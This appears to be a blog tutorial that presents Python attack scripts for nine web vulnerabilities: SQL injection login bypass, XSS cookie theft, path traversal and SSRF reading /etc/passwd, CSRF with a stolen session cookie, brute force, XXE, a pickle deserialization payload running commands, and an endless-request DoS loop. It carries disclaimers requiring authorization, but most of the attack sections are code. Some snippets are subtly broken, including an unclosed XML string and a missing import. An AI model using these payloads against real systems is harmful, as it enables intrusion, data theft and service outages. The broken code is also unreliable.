Use Python to do security testing and attack actual combat

In this article, we’ll use Python to conduct a hands-on security testing exercise with the goal of finding and exploiting application security vulnerabilities. Note that this walkthrough is for educational and research purposes only, do not use these techniques for illegal activities.

Note: Unauthorized attacks are against the law. Make sure you perform these attacks in an environment with explicit permissions, such as your own application or an application that has been explicitly authorized.

1. SQL injection attack

SQL injection is a common security hole. In the following example, we use Python to simulate a SQL injection attack:

import requests

url = ''
data = {'username': 'admin', 'password': "' OR '1'='1"}

response = requests. post(url, data=data)

if 'Welcome' in response.text:
    print('SQL Injection successful')

In this example, we send a request containing malicious SQL code to the target website. If the site doesn’t handle user input properly, then we might be able to successfully log in as an administrator.

2. XSS attack

Cross-site scripting (XSS) is a common vulnerability in web applications. In the following example, we use Python to simulate an XSS attack:

import requests

url = ''
data = {'comment': '<script>document.location="" + document.cookie</script>'}

requests. post(url, data=data)

In this example, we send a request containing malicious JavaScript code to the target website. If the website doesn’t properly sanitize user input, this code will execute in other users’ browsers and send their cookies to the attacker’s website.

3. Path traversal attack

A path traversal attack is an attack that attempts to access files in the file system that should not be accessed. In the following example, we use Python to simulate a path traversal attack

import requests

url = ''
params = {'file': '../etc/passwd'}

response = requests. get(url, params=params)

if 'root:' in response.text:
    print('Path traversal attack successful')

In this example, we send a request to the target website, trying to access the /etc/passwd file, which is a file that usually contains user account information. If the website does not properly restrict file access paths, then we will be able to access this file.

This is just part of a security testing hands-on exercise that provides some basic attack techniques. Remember, the goal is to find and fix these vulnerabilities, not exploit them for malicious activity.

4. CSRF attack

Cross-site request forgery (CSRF) attacks allow an attacker to impersonate a victim and perform unauthorized actions on their behalf. The following Python code example simulates a CSRF attack:

import requests

url = ''
cookies = {'session': 'stolen-session-cookie'}
data = {'email': '[email protected]'}

requests. post(url, cookies=cookies, data=data)

In this example, we use a stolen session cookie to send a change email request to the target site. If the website does not implement CSRF protection properly, then we can successfully change the victim’s email address.

5. Exhaustive attack

A brute force attack is an attack that attempts to exhaust all possible password combinations to guess a password. In the following Python code example, we simulate a brute force attack

import requests
import itertools

url = ''

for length in range(1, 4):
    for password in itertools. product('1234567890', repeat=length):
        password = ''.join(password)
        data = {'username': 'admin', 'password': password}
        response = requests. post(url, data=data)
        if 'Welcome' in response.text:
            print('Password is', password)

In this example, we exhaustively enumerate all numeric passwords of length 1 to 3 and try to log in with these passwords. If the website does not implement any measures to prevent brute force attacks, such as account lockouts or verification codes, then we may be able to successfully guess the password.

6. Server Side Request Forgery (SSRF) Attack

Server-side request forgery is a security hole constructed by an attacker and initiated by an application server. The following Python code example simulates an SSRF attack:

import requests

url = ''
params = {'url': 'file:///etc/passwd'}

response = requests. get(url, params=params)

if 'root:' in response.text:
    print('SSRF attack successful')

In this example, we try to make the target server read the local /etc/passwd file. We can read this file if the server does not properly validate or limit input received from URL redirects.

7. XML external entity (XXE) attack

XML external entity attack is to use the vulnerability of XML parser to steal data from the server by constructing malicious XML input. The following Python code example simulates an XXE attack:

import requests

url = ''
data = """
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
<foo> &xxe;</foo>

response = requests. post(url, data=data)

if 'root:' in response.text:
    print('XXE attack successful')

In this example, we send a request containing malicious XML to the target website. If the server does not disable external entities when processing XML input, we can read the server’s local files through an XXE attack.

8. Insecure deserialization attacks

Insecure deserialization can allow an attacker to execute malicious code on the server. The following Python code example demonstrates an insecure deserialization attack:

import requests
import pickle
import base64

class Exploit(object):
    def __reduce__(self):
        return (os. system, ('id',))

payload = base64.b64encode(pickle.dumps(Exploit()))

requests.get('', cookies={'payload': payload})

In this example, we create a special class that tries to run the id command on the server when it is deserialized. If the server does not handle the serialized data properly, we can successfully perform this attack.

9. Denial of service (DoS) attack

The goal of a denial of service attack is to render a service unusable. The following Python code example demonstrates a DoS attack:

import requests

url = ''

while True:
    requests. get(url)

In this example, we continuously send requests to the target server, with the goal of exhausting the server’s resources so that it cannot serve other normal requests. Note that this attack can have severe server impacts, so only do it if you have permission and know the possible consequences.

In general, security testing is an important task that can help us find and fix security vulnerabilities in applications. By understanding how these attacks work, we can better prevent them and improve the security of our applications. However, make sure you perform these attacks in an environment with explicit permissions, and only use this knowledge to improve the security of your application, not to conduct malicious activities.

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